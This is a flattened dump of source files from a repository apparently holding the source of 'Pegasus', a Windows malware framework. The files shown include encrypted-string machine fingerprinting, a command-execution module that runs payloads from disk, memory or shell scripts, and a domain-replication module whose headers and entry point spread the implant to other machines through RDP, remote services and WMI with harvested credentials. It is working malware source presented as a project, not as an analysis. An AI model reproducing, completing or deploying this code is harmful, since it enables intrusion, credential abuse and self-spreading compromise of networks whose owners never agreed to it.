53 | 54 | 55 | } // got kernel32 handle 56 | 57 | 58 | } __except(1) { DbgPrint("WARN: exception"); } 59 | 60 | DbgPrint("res=%u", bRes); 61 | return bRes; 62 | #endif 63 | } -------------------------------------------------------------------------------- /Pegasus/inc/WOW64Detect.h: -------------------------------------------------------------------------------- 1 | /* 2 | WOW64Detect.h 3 | Headers file 4 | 5 | */ 6 | 7 | #include 8 | 9 | typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL); // api definition 10 | 11 | BOOL IsX64Windows(); -------------------------------------------------------------------------------- /Pegasus/inc/WorkDispatcher.h: -------------------------------------------------------------------------------- 1 | /* 2 | WorkDispatcher.h 3 | */ 4 | 5 | #include 6 | 7 | #include "..\Shellcode\shellcode.h" 8 | 9 | #pragma pack(push) 10 | #pragma pack(1) 11 | 12 | // termination query request, for version check at PMI_TERMINATE_HOST_PROCESS_IF_LOWER_VERSION pipe message 13 | typedef struct _TERMINATION_QUERY 14 | { 15 | 16 | UINT64 i64TerminationHash; // special build-specific termination hash, to prevent replacement of builds for different targets 17 | WORD wBuildId; // ON QUERY: build id of caller, which requests termination of an already running installation 18 | // ON ANSWER: build id of callee, so caller may check version and perform self-termination in case of a higher existent version 19 | 20 | } TERMINATION_QUERY, *PTERMINATION_QUERY; 21 | 22 | #pragma pack(pop) 23 | 24 | VOID WorkDispatcherInit(SHELLCODE_CONTEXT *sc); -------------------------------------------------------------------------------- /Pegasus/inc/Wow64Jump.h: -------------------------------------------------------------------------------- 1 | /* 2 | Wow64Jump.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | VOID wjWow64JumpTo64(); -------------------------------------------------------------------------------- /Pegasus/inc/dbg.c: -------------------------------------------------------------------------------- 1 | /* 2 | dbg.c 3 | Misc debug-related routines. Used only in case of debug build 4 | 5 | Added support of module name in dbg out, which should be defined in 6 | C/C++ > Command Line > Additional options like 7 | /DDBG_MODULENAME="name_of_module" 8 | 9 | */ 10 | 11 | 12 | #include 13 | #include "dbg.h" 14 | 15 | 16 | 17 | #ifdef _DEBUG 18 | 19 | /* 20 | NB: All procs here are compiled only in DEBUG mode 21 | 22 | 23 | */ 24 | 25 | #pragma message("WARN: DEBUG TOOLS COMPILED") 26 | 27 | // dumps data into filename specified 28 | VOID _dbgDumpToFile(PWCHAR wszTargetFName, PVOID pData, DWORD dwLen) 29 | { 30 | HANDLE hFile; 31 | DWORD dwWritten; 32 | 33 | hFile = CreateFileW(wszTargetFName, GENERIC_READ + GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); 34 | if (hFile!=INVALID_HANDLE_VALUE) { 35 | WriteFile(hFile, pData, dwLen, &dwWritten, 0); 36 | CloseHandle(hFile); 37 | } 38 | 39 | } 40 | 41 | 42 | 43 | // overhead for OutputDebugStringA adding misc extra information 44 | VOID _dbgOutString(LPSTR szDbgMsg) 45 | { 46 | 47 | __try { 48 | 49 | LPSTR szBuff; // target buffer for final string 50 | LPSTR szModuleName; 51 | 52 | LPSTR szEndLine = "\r\n"; 53 | 54 | #if defined(_M_X64) 55 | LPSTR szPlatform = "x64"; 56 | #elif defined(_M_IX86) 57 | LPSTR szPlatform = "x32"; 58 | #else 59 | LPSTR szPlatform = "xUNK"; 60 | #endif 61 | 62 | // source code name definition 63 | #if defined(DBG_MODULENAME) 64 | LPSTR szdbgModuleName = QUOTE(DBG_MODULENAME); 65 | #else 66 | #pragma message("WARN: DBG_MODULENAME not defined, use C/C++ > Command Line > Additional options, like /DDBG_MODULENAME=\"name_of_module\"") 67 | LPSTR szdbgModuleName = "_"; 68 | #endif 69 | 70 | LPSTR szLogFile; // filename to log into 71 | HANDLE hFile = 0; // file handle 72 | DWORD dwWritten; // amount of bytes written by WriteFile, actually not used 73 | 74 | szBuff = (LPSTR)GlobalAlloc(GPTR, 12000); 75 | szModuleName = (LPSTR)GlobalAlloc(GPTR, 1024); 76 | szLogFile = (LPSTR)GlobalAlloc(GPTR, 1024); 77 | 78 | // query self module name 79 | GetModuleFileNameA(0, szModuleName, MAX_PATH + 1); 80 | lstrcpyA(szLogFile, szModuleName); 81 | lstrcatA(szLogFile, ".tlog"); 82 | 83 | wsprintfA(szBuff, "%s(%04Xh:%u/%u)[%s %s]: %s", szModuleName, GetTickCount(), GetCurrentProcessId(), GetCurrentThreadId(), szdbgModuleName, szPlatform, szDbgMsg ); 84 | 85 | 86 | 87 | // check if last 2 chars are \r\n 88 | if (lstrlenA(szBuff)>2) { 89 | 90 | // cut last 2 chars 91 | if (lstrcmpA( (LPSTR)( (SIZE_T)szBuff + lstrlenA(szBuff) - 2 ), szEndLine)) { 92 | 93 | // not equal, add newline 94 | lstrcatA(szBuff, szEndLine); 95 | 96 | } // compare last chars 97 | 98 | } // strlen check 99 | 100 | 101 | // output string 102 | OutputDebugStringA(szBuff); 103 | 104 | 105 | 106 | // dump to a logfile too 107 | hFile=CreateFileA(szLogFile, GENERIC_READ + GENERIC_WRITE, FILE_SHARE_READ + FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); 108 | if (hFile!=INVALID_HANDLE_VALUE) { 109 | SetFilePointer(hFile, 0, NULL, FILE_END); 110 | WriteFile(hFile, szBuff, lstrlenA(szBuff), &dwWritten, NULL); 111 | CloseHandle(hFile); 112 | } 113 | 114 | 115 | // free some used mem 116 | GlobalFree(szBuff); 117 | GlobalFree(szModuleName); 118 | GlobalFree(szLogFile); 119 | 120 | } __except(1) { __try { OutputDebugStringA("dbg exception\r\n"); } __except(1) {} } 121 | 122 | } 123 | 124 | 125 | 126 | 127 | #endif 128 | -------------------------------------------------------------------------------- /Pegasus/inc/dbg.h: -------------------------------------------------------------------------------- 1 | /* 2 | dbg.h 3 | Debug logging and output functions 4 | */ 5 | #pragma once 6 | #include 7 | 8 | #ifdef _DEBUG 9 | 10 | // debug version 11 | 12 | 13 | #ifdef __cplusplus 14 | extern "C" { 15 | #endif 16 | VOID _dbgDumpToFile(PWCHAR wszTargetFName, PVOID pData, DWORD dwLen); 17 | VOID _dbgOutString(LPSTR szDbgMsg); 18 | #ifdef __cplusplus 19 | } 20 | #endif 21 | 22 | 23 | // new dbg 24 | #define QUOTE_(WHAT) #WHAT 25 | #define QUOTE(WHAT) QUOTE_(WHAT) 26 | 27 | #pragma warning(disable:4996) // 'sprintf': This function or variable may be unsafe. 28 | #define DbgPrint(fmt, ...) \ 29 | { LPSTR buff = (LPSTR)GlobalAlloc(GPTR, 0x10000); \ 30 | wsprintfA(buff, "%s: "fmt, __FILE__"@"__FUNCTION__"@"QUOTE(__LINE__), ## __VA_ARGS__); \ 31 | _dbgOutString(buff); \ 32 | GlobalFree(buff); } 33 | 34 | #define _return DbgPrint("this would cause proc to exit, ignoring due to debug mode") 35 | 36 | #else 37 | 38 | // release version 39 | // all macro are assumed to be null 40 | 41 | #define DbgPrint(args, ...) 42 | #define _dbgDumpToFile(args, ...) 43 | 44 | #define _return return 45 | 46 | 47 | #endif 48 | 49 | -------------------------------------------------------------------------------- /Pegasus/inc/machineid.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | machineid.cpp 4 | Compatible machine id calculation 5 | 6 | */ 7 | 8 | 9 | #include 10 | 11 | #include "mem.h" 12 | #include "dbg.h" 13 | #include "CryptoStrings.h" 14 | 15 | #include "machineid.h" 16 | 17 | 18 | // perform rol operation on 32-bit argument 19 | static DWORD rol(DWORD dwArg, BYTE bPlaces) 20 | { 21 | return ( (dwArg<>(32-bPlaces)) ); 22 | } 23 | 24 | // make dword hash from string 25 | DWORD _myHashStringW(LPWSTR wszString) 26 | { 27 | DWORD dwResult = 0; // output result, temp hash value 28 | BYTE b_cr = 0; // cr shift value 29 | ULONG i = 0; // counter 30 | WORD *pwChar = (WORD *)wszString; 31 | 32 | // loop passed string 33 | while (*pwChar) { 34 | 35 | // make step's shift value, normalized to 4-byte shift (31 max) 36 | b_cr = (b_cr ^ (BYTE)(*pwChar)) & 0x1F; 37 | 38 | // xor hash with current char and rol hash, cr 39 | dwResult = rol(dwResult ^ (BYTE)(*pwChar), b_cr); 40 | 41 | pwChar++; 42 | 43 | } // while !null char 44 | 45 | 46 | // output result 47 | return dwResult; 48 | } 49 | 50 | /* 51 | internal func 52 | Calculates hash for name of first physical disk 53 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Disk\Enum, value name "0" 54 | */ 55 | DWORD _hwsFirstVolumeModelHash() 56 | { 57 | DWORD dwRes = 0; // func res 58 | HKEY hKey = NULL; // RegOpenKeyEx() res 59 | LPWSTR wszSubkey, wszParamName; // decrypt string buff 60 | DWORD dwDataLen = 0; // key len 61 | LPWSTR wszBuff = NULL; // key buff 62 | 63 | wszSubkey = CRSTRW("SYSTEM\\CurrentControlSet\\services\\Disk\\Enum", "\xfd\x3f\x14\x05\xd6\x3f\x27\x34\xde\x13\xd1\xc0\x31\xe4\xc1\xdf\x3f\xe2\xba\xb9\x6e\x88\x9a\x99\x7f\xa8\x78\x5e\x88\x53\x68\x5e\xa8\x75\x22\x24\xce\x02\x07\x31\xc9\x2e\xe7\xe6\x31\xe2\xda\xd8\x20\x30\xe4"); 64 | wszParamName = CRSTRW("0", "\x00\xc0\x92\x0e\x01\xc0\xc2"); 65 | 66 | do { // not a loop 67 | 68 | if (ERROR_SUCCESS != RegOpenKeyEx(HKEY_LOCAL_MACHINE, wszSubkey, 0, KEY_READ, &hKey)) { DbgPrint("ERR: RegOpenKeyEx() failed %04Xh", GetLastError()); break; } 69 | 70 | // key opened ok, query value 71 | if (ERROR_SUCCESS != RegQueryValueEx(hKey, wszParamName, NULL, NULL, NULL, &dwDataLen)) { DbgPrint("ERR: RegQueryValueEx() failed %04Xh", GetLastError()); break; } 72 | 73 | // alloc buff 74 | if (!(wszBuff = (LPWSTR)my_alloc((dwDataLen + 1) * 2))) { DbgPrint("ERR: failed to alloc %u bytes", ((dwDataLen + 1) * 2) ); break; } 75 | 76 | if (ERROR_SUCCESS != RegQueryValueEx(hKey, wszParamName, NULL, NULL, (LPBYTE)wszBuff, &dwDataLen)) { DbgPrint("ERR: RegQueryValueEx() failed %04Xh", GetLastError()); break; } 77 | 78 | // calc hash and store it 79 | dwRes = _myHashStringW(wszBuff); 80 | 81 | } while (FALSE); // not a loop 82 | 83 | if (wszBuff) { my_free(wszBuff); } 84 | if (hKey) { RegCloseKey(hKey); } 85 | 86 | my_free(wszParamName); 87 | my_free(wszSubkey); 88 | 89 | return dwRes; 90 | } 91 | 92 | // main magic is done here 93 | UINT64 i64MakeMachineID() 94 | { 95 | ULONG iBufferSize = MAX_COMPUTERNAME_LENGTH + 1; 96 | 97 | LPWSTR wszCompName; // buffer for computer's name 98 | DWORD dwHash2; 99 | 100 | // and part2 using Computer name 101 | wszCompName = (LPWSTR)my_alloc(iBufferSize * 2); 102 | GetComputerName(wszCompName, &iBufferSize); 103 | dwHash2 = _myHashStringW(wszCompName); 104 | my_free(wszCompName); 105 | 106 | 107 | // dwHash1 & dwHash2 now contain the resulting parts of machine id hash 108 | return (UINT64)( ((UINT64)_hwsFirstVolumeModelHash() << 32) | (UINT64)dwHash2 ); 109 | 110 | } // func end 111 | 112 | -------------------------------------------------------------------------------- /Pegasus/inc/machineid.h: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | machineid.h 4 | 5 | */ 6 | 7 | #pragma once 8 | 9 | #include 10 | 11 | UINT64 i64MakeMachineID(); 12 | 13 | 14 | -------------------------------------------------------------------------------- /Pegasus/inc/mem.h: -------------------------------------------------------------------------------- 1 | /* 2 | mem.h 3 | Headers file 4 | */ 5 | 6 | #pragma once 7 | #include 8 | 9 | #ifdef _DEBUG 10 | //#if defined(_M_IX86) 11 | #define ALLOW_DBGMEM 12 | #define DO_MEMALLOC_LIST_CHECK 13 | //#endif 14 | #endif 15 | 16 | #define MEM_CHUNK_SIGNATURE 0x0BBBBBBBB 17 | #define GUARD_PAGE_SIZE 4096*4 18 | 19 | /* 20 | Used in debug mode to tag every 21 | */ 22 | typedef struct _MEM_CHUNK_TAG 23 | { 24 | DWORD dwSignature; // special signature 25 | WORD wLen; // len of this structure 26 | DWORD dwAllocatedStamp; // ticks count when this chunk was allocated 27 | BYTE bCallerString[128]; // buffer with caller name string 28 | DWORD dwAllocatedSize; // total size of allocated buffer, including this tag 29 | } MEM_CHUNK_TAG, *PMEM_CHUNK_TAG; 30 | 31 | // single chunk pointer by linked list 32 | typedef struct _LIST_CHUNK LIST_CHUNK; 33 | typedef struct _LIST_CHUNK 34 | { 35 | LIST_CHUNK *lcNext; 36 | LPVOID pChunkPtr; 37 | 38 | } LIST_CHUNK, *PLIST_CHUNK; 39 | 40 | 41 | #ifdef ALLOW_DBGMEM 42 | // in debug mode, each my_alloc() is a special macro which sends source code sign 43 | // to be added to memory chunk 44 | #define QUOTE_(WHAT) #WHAT 45 | #define QUOTE(WHAT) QUOTE_(WHAT) 46 | #define my_alloc(lMemSize) my_alloc_int(__FUNCTION__"@"QUOTE(__LINE__), lMemSize) 47 | #define my_free(pMemBuff_in) my_free_int(__FUNCTION__"@"QUOTE(__LINE__), pMemBuff_in) 48 | #ifdef __cplusplus 49 | extern "C" { 50 | #endif 51 | LPVOID my_alloc_int(LPSTR szCaller, SIZE_T lMemSize); 52 | VOID my_free_int(LPSTR szCaller, PVOID pMemBuff_in); 53 | #ifdef DO_MEMALLOC_LIST_CHECK 54 | DWORD WINAPI memPrintAllocationListDialog(LPVOID dwParam); 55 | #endif 56 | #ifdef __cplusplus 57 | } 58 | #endif 59 | 60 | #else 61 | 62 | 63 | // release mode functions 64 | 65 | #ifdef __cplusplus 66 | extern "C" { 67 | #endif 68 | LPVOID my_alloc(SIZE_T lMemSize); 69 | VOID my_free(PVOID pMemBuff); 70 | #ifdef __cplusplus 71 | } 72 | #endif 73 | 74 | #endif 75 | 76 | 77 | 78 | #define GLOBAL_ALLOC // if not defined, VirtualAlloc will be used 79 | -------------------------------------------------------------------------------- /Pegasus/lib/amd64/BufferOverflowU.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/lib/amd64/BufferOverflowU.lib -------------------------------------------------------------------------------- /Pegasus/lib/amd64/ntdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/lib/amd64/ntdll.lib -------------------------------------------------------------------------------- /Pegasus/lib/i386/BufferOverflowU.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/lib/i386/BufferOverflowU.lib -------------------------------------------------------------------------------- /Pegasus/lib/i386/ntdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/lib/i386/ntdll.lib -------------------------------------------------------------------------------- /Pegasus/mod_CmdExec/ceDiskExec.h: -------------------------------------------------------------------------------- 1 | /* 2 | ceDiskExec.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | 8 | #include "..\inc\DataCallbackManager.h" 9 | #include "ceGeneric.h" 10 | 11 | typedef enum DISKEXEC_SPECIFIC_ERROR_CODES { 12 | // ERR_NOVALUE = 0, 13 | ERR_DE_EMPTY_FILE = 1, 14 | ERR_DE_NO_EXTENSION_FOUND, 15 | ERR_DE_TMPFILE_NAME_GENERATE_FAIL, 16 | ERR_DE_CREATEFILE_FAILED, 17 | ERR_DE_WRITEFILE_FAILED, 18 | ERR_DE_FILE_REMOVED_AFTER_CREATION, 19 | ERR_DE_GETSIZE_FAILED, 20 | ERR_DE_SIZE_MISMATCH, 21 | ERR_DE_FILE_READ_FAILED, 22 | ERR_DE_FILE_MODIFIED_AFTER_WRITE 23 | 24 | // ERR_EXEC_ERROR = 1000, // staring range 25 | // ERR_MAXVAL = MAXDWORD 26 | }; 27 | 28 | typedef enum ENUM_PLACEFILE_EXT { 29 | FILE_EXE, 30 | FILE_EXTENS 31 | }; 32 | 33 | BOOL cmdDiskExec(DISPATCHER_CALLBACK_PARAMS *dcp, ENUM_EXECUTE_METHOD ExecMethod); -------------------------------------------------------------------------------- /Pegasus/mod_CmdExec/ceDllMemory.h: -------------------------------------------------------------------------------- 1 | /* 2 | ceDllMemory.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | #include "..\inc\MyStreams.h" 8 | #include "..\inc\DataCallbackManager.h" 9 | 10 | typedef enum DLLMEM_SPECIFIC_ERROR_CODES { 11 | // ERR_NOVALUE = 0, 12 | ERR_ALREADY_RUNNING = 1, 13 | ERR_EMPTY_FILE, 14 | ERR_PE_LOAD_FAILED, 15 | ERR_DLLENTRY_RETURNED_FALSE, 16 | ERR_DLLENTRY_EXCEPTION, 17 | 18 | // ERR_EXEC_ERROR = 1000, // staring range 19 | // ERR_MAXVAL = MAXDWORD 20 | }; 21 | 22 | // internal globals 23 | typedef struct _DLLMEM_CONTEXT { 24 | 25 | BOOL bInited; // set to TRUE when this context is already inited 26 | MY_STREAM mHashesStream; // hashes of running modules 27 | CRITICAL_SECTION csHashesAccess; // cs to guard access to mHashesStream 28 | 29 | } DLLMEM_CONTEXT, *PDLLMEM_CONTEXT; 30 | 31 | BOOL cmdDllMemory(DISPATCHER_CALLBACK_PARAMS *dcp); -------------------------------------------------------------------------------- /Pegasus/mod_CmdExec/ceGeneric.h: -------------------------------------------------------------------------------- 1 | /* 2 | ceGeneric.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | 8 | // param at cmdDiskExec 9 | typedef enum ENUM_EXECUTE_METHOD { 10 | EEM_CREATEPROCESS, 11 | EEM_SHELLEXECUTE 12 | }; 13 | 14 | // errors returned by _cmdSafeExec() 15 | typedef enum EXEC_ERROR_CODE { 16 | ERR_EXEC_OK = 0, // no error, ok 17 | ERR_EXEC_HUNGED = 1000, 18 | ERR_EXEC_FAILURE 19 | }; 20 | 21 | // params to be passed to a CreateProcessSafe() function 22 | typedef struct _CREATEPROCESS_PARAMS { 23 | 24 | ENUM_EXECUTE_METHOD emExecMethod; // type of exec method to be used 25 | 26 | // std handles for process & controller. Should be NULL if not used 27 | HANDLE hStdInRead, hStdInWrite, hStdOutRead, hStdOutWrite;// , hStdErrRead, hStdErrWrite; 28 | 29 | // params for CreateProcess()/EEM_CREATEPROCESS 30 | LPWSTR wszApplication; 31 | LPWSTR wszCmdline; 32 | 33 | PROCESS_INFORMATION pi; // result in case of CreateProcess()/EEM_CREATEPROCESS 34 | 35 | BOOL bExecResult; // TRUE in case of exec api was ok 36 | DWORD dwLastError; // GetLastError() result after api call 37 | 38 | // internals 39 | HANDLE hExecThread; // handle of a thread used to execute CreateProcess/... apis 40 | BOOL bNeedTerminateExecThread; // set by caller if it needs to perform termination of hExecThread thread 41 | BOOL bTerminationStarted; // set by thread when it copied all necessary data and it's safe to free input params ptr 42 | 43 | } CREATEPROCESS_PARAMS, *PCREATEPROCESS_PARAMS; 44 | 45 | 46 | 47 | 48 | 49 | #pragma pack(push) 50 | #pragma pack(1) 51 | 52 | // sent with CER_ERR_SPECIFIC_ERROR result code 53 | typedef struct _CMDEXEC_SPECIFIC_ERROR { 54 | 55 | DWORD dwSpecificErrCode; // internal id of place where an error was catched 56 | DWORD dwLastError; // GetLastError() result 57 | 58 | } CMDEXEC_SPECIFIC_ERROR, *PCMDEXEC_SPECIFIC_ERROR; 59 | 60 | #pragma pack(pop) 61 | 62 | VOID cmFormAnswer(DISPATCHER_CALLBACK_PARAMS *dcp, WORD wResult, LPVOID pPayload, DWORD dwPayloadLen); 63 | VOID cmFormAnswerSpecificErr(DISPATCHER_CALLBACK_PARAMS *dcp, DWORD dwSpecificErrCode, DWORD dwLastError); 64 | BOOL _cmdCreateStdPipes(CREATEPROCESS_PARAMS *cpParams); 65 | VOID _cmdFreeStdPipes(CREATEPROCESS_PARAMS *cpParams); 66 | DWORD WINAPI thrSafeExec(LPVOID lpParameter); 67 | BOOL _cmdSafeExec(CREATEPROCESS_PARAMS *cpParams, EXEC_ERROR_CODE *seError); 68 | -------------------------------------------------------------------------------- /Pegasus/mod_CmdExec/ceShellScript.h: -------------------------------------------------------------------------------- 1 | /* 2 | ceShellScript.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | 8 | typedef enum SHELLSCRIPT_SPECIFIC_ERROR_CODES { 9 | // ERR_NOVALUE = 0, 10 | ERR_CREATEPIPES_FAIL = 1, 11 | ERR_EMPTY_SHELLSCRIPT, 12 | ERR_STDIN_WRITE_FAILED, 13 | ERR_STDIN_WRITE_FAILED_2, 14 | ERR_PEEKPIPE_FAILED 15 | 16 | 17 | // ERR_EXEC_ERROR = 1000, 18 | // ERR_MAXVAL = MAXDWORD 19 | }; 20 | 21 | BOOL cmdShellScript(DISPATCHER_CALLBACK_PARAMS *dcp); -------------------------------------------------------------------------------- /Pegasus/mod_CmdExec/mod_CmdExec.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Source Files 6 | 7 | 8 | Source Files\libs 9 | 10 | 11 | Source Files\libs 12 | 13 | 14 | Source Files\libs 15 | 16 | 17 | Source Files 18 | 19 | 20 | Source Files\incs 21 | 22 | 23 | Source Files\incs 24 | 25 | 26 | Source Files\libs 27 | 28 | 29 | Source Files\libs 30 | 31 | 32 | Source Files\libs 33 | 34 | 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files 41 | 42 | 43 | Header Files\libs 44 | 45 | 46 | Header Files\libs 47 | 48 | 49 | Header Files\libs 50 | 51 | 52 | Header Files 53 | 54 | 55 | Header Files\incs 56 | 57 | 58 | Header Files\incs 59 | 60 | 61 | Header Files\libs 62 | 63 | 64 | Header Files\libs 65 | 66 | 67 | Header Files\libs 68 | 69 | 70 | Header Files 71 | 72 | 73 | Header Files 74 | 75 | 76 | 77 | 78 | {e9874ae9-5322-4bf1-90b7-053fe676066c} 79 | 80 | 81 | {626d82b2-93ec-4885-ae5c-9e4a3067f6b9} 82 | 83 | 84 | {aa96f6c4-8d23-4164-a305-97ed9717fd8e} 85 | 86 | 87 | {096d18db-ef92-41b5-bef2-bf2e48da28fc} 88 | 89 | 90 | {f41dc97e-2f8a-444c-8cd6-25b3b3784da6} 91 | 92 | 93 | {68a8556c-6033-494b-981f-27c34db729ca} 94 | 95 | 96 | -------------------------------------------------------------------------------- /Pegasus/mod_CmdExec/mod_CmdExec.h: -------------------------------------------------------------------------------- 1 | /* 2 | mod_CmdExec.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/DomainReplication.h: -------------------------------------------------------------------------------- 1 | /* 2 | DomainReplication.h 3 | Headers file 4 | */ 5 | #pragma once 6 | 7 | #include 8 | #include 9 | 10 | // action type for drConnection() function 11 | typedef enum DRA_TYPE { 12 | DRA_CONNECT = 1, 13 | DRA_DISCONNECT 14 | }; 15 | 16 | // resource name for drConnection() function 17 | typedef enum DRR_TYPE { 18 | DRR_NULL_SESSION = 1, 19 | DRR_ADMIN_SHARE, 20 | DRR_C_SHARE, 21 | DRR_SPECIFIED = 255 22 | }; 23 | 24 | typedef struct _DR_ACCESS_VARS 25 | { 26 | BOOL bInited; // indicates this structure was properly inited, to check if deinit needed 27 | 28 | // sid-related vars 29 | 30 | PSID pEveryoneSID; 31 | EXPLICIT_ACCESS ea[1]; 32 | PACL pACL; 33 | PSECURITY_DESCRIPTOR pSD; 34 | 35 | // result 36 | SECURITY_ATTRIBUTES sa; 37 | 38 | } DR_ACCESS_VARS, *PDR_ACCESS_VARS; 39 | 40 | VOID infStartDomainReplication(); 41 | 42 | BOOL drInitEveryoneREsa(DR_ACCESS_VARS *dav); 43 | VOID drFreeEveryoneREsa(DR_ACCESS_VARS *dav); -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/RDP.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/mod_DomainReplication/RDP.cpp -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/RDP.h: -------------------------------------------------------------------------------- 1 | /* 2 | RDP.h 3 | */ 4 | 5 | #include 6 | 7 | BOOL rdpAttemptReplication(LPWSTR wszTargetMachine, LPWSTR wszUsername, LPWSTR wszPassword); -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/SCM.h: -------------------------------------------------------------------------------- 1 | /* 2 | SCM.h 3 | */ 4 | 5 | #include 6 | 7 | // params passed from _drRemoteServiceAsync() to it's child thread _drthrRemoteService() 8 | typedef struct _REMSRV_THREAD_PARAMS 9 | { 10 | // input params 11 | LPWSTR wszTargetMachine; 12 | LPWSTR wszRemoteFilename; 13 | 14 | // sync object 15 | HANDLE hThreadStarted; // event object signalled when thread's init done and it's safe to wait for hSyncObject 16 | HANDLE hSyncObject; // event signalled when caller may exit, indicating remote file is possibly running or some error occured. Cleanup is done by thread internally anyway 17 | HANDLE hCallerExited; // set by caller when it terminates and thread may dispose params structure safely 18 | 19 | // result output 20 | BOOL bResult; 21 | 22 | } REMSRV_THREAD_PARAMS, *PREMSRV_THREAD_PARAMS; 23 | 24 | BOOL scmStartRemoteFileAsServiceAsync(LPWSTR wszTargetMachine, LPWSTR wszRemoteFilename); -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/WMI.h: -------------------------------------------------------------------------------- 1 | /* 2 | WMI.h 3 | */ 4 | 5 | #include 6 | 7 | 8 | #ifdef __cplusplus 9 | extern "C" { 10 | #endif 11 | 12 | BOOL wmiStartRemoteProcess(LPWSTR wszTargetMachine, LPWSTR wszRemoteFilename, LPWSTR wszUsername, LPWSTR wszPassword); 13 | 14 | #ifdef __cplusplus 15 | } 16 | #endif -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/mod_DomainReplication.c: -------------------------------------------------------------------------------- 1 | /* 2 | mod_DomainReplication.c 3 | Main file for module DomainReplication 4 | NB: configuration of this project defines ROUTINES_BY_PTR, so all libs will use definition of a ptr instead of code itself, 5 | and it is essential to perform proper initialization of all pointers, received from main (core) module 6 | 7 | */ 8 | 9 | 10 | // perform essential compiler settings 11 | // remove stdlib 12 | #pragma comment(linker, "/NODEFAULTLIB:libcmt.lib") 13 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRT.lib") 14 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRTD.lib") 15 | #pragma comment(linker, "/NODEFAULTLIB:libcmtd.lib") 16 | 17 | 18 | #include 19 | 20 | #include "..\inc\dbg.h" 21 | #include "..\shared\ModuleAPI.h" 22 | 23 | #include "DomainReplication.h" 24 | 25 | 26 | 27 | 28 | 29 | #if defined(_M_X64) 30 | // x64 system libs 31 | #pragma comment (lib, "..\\lib\\amd64\\BufferOverflowU.lib") 32 | #pragma comment (lib, "..\\lib\\amd64\\ntdll.lib") 33 | #elif defined(_M_IX86) 34 | // x32 system libs 35 | #pragma comment (lib, "..\\lib\\i386\\BufferOverflowU.lib") 36 | #pragma comment (lib, "..\\lib\\i386\\ntdll.lib") 37 | #else 38 | #error Unknown target CPU, no system libs can be found 39 | #endif 40 | 41 | 42 | 43 | #include "mod_DomainReplication.h" 44 | 45 | /* 46 | Imports init function, should contain calls to ALL modules which is used by internal calls (reference build output to check 47 | which modules are compiled in ROUTINES_BY_PTR when particular module is being build) 48 | */ 49 | BOOL modInitImports(CORE_APIS *pCoreAPIs) 50 | { 51 | BOOL bRes = TRUE; // ok by default 52 | 53 | HashedStrings_resolve(pCoreAPIs->HashedStrings_apis); 54 | // PipeWorks_resolve(pCoreAPIs->PipeWorks_apis); // direct use here 55 | DomainListMachines_resolve(pCoreAPIs->DomainListMachines_apis); 56 | CredManager_resolve(pCoreAPIs->CredManager_apis); 57 | EmbeddedResources_resolve(pCoreAPIs->EmbeddedResources_apis); 58 | MyStringRoutines_resolve(pCoreAPIs->MyStringRoutines_apis); 59 | CryptoStrings_resolve(pCoreAPIs->CryptoStrings_apis); 60 | RndClass_resolve(pCoreAPIs->RndClass_apis); 61 | // MailslotWorks_resolve(pCoreAPIs->MailslotWorks_apis); // is really used? 62 | // DataCallbackManager_resolve(pCoreAPIs->DataCallbackManager_apis); // is really used? 63 | 64 | return bRes; 65 | } 66 | 67 | /* 68 | Routine to be execute when all init are finished 69 | */ 70 | DWORD WINAPI thrModuleRun(LPVOID lpParameter) 71 | { 72 | DbgPrint("entered"); 73 | 74 | infStartDomainReplication(); 75 | 76 | DbgPrint("finished"); 77 | 78 | return 0; 79 | } 80 | 81 | 82 | 83 | // entrypoint function for module 84 | BOOL WINAPI DllEntry(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 85 | { 86 | BOOL bRes = TRUE; // need return TRUE to proceed next 87 | CORE_APIS *pCoreAPIs = (CORE_APIS *)lpvReserved; 88 | DWORD dwThreadId; 89 | 90 | if (fdwReason == DLL_PROCESS_ATTACH) { 91 | 92 | DbgPrint("DLL_PROCESS_ATTACH: entered"); 93 | 94 | // do apis init in ALL used modules 95 | modInitImports(pCoreAPIs); 96 | 97 | // start work thread 98 | CloseHandle(CreateThread(NULL, 0, thrModuleRun, NULL, 0, &dwThreadId)); 99 | 100 | DbgPrint("DLL_PROCESS_ATTACH: done"); 101 | 102 | } // DLL_PROCESS_ATTACH 103 | 104 | return bRes; 105 | } 106 | 107 | 108 | 109 | 110 | 111 | 112 | 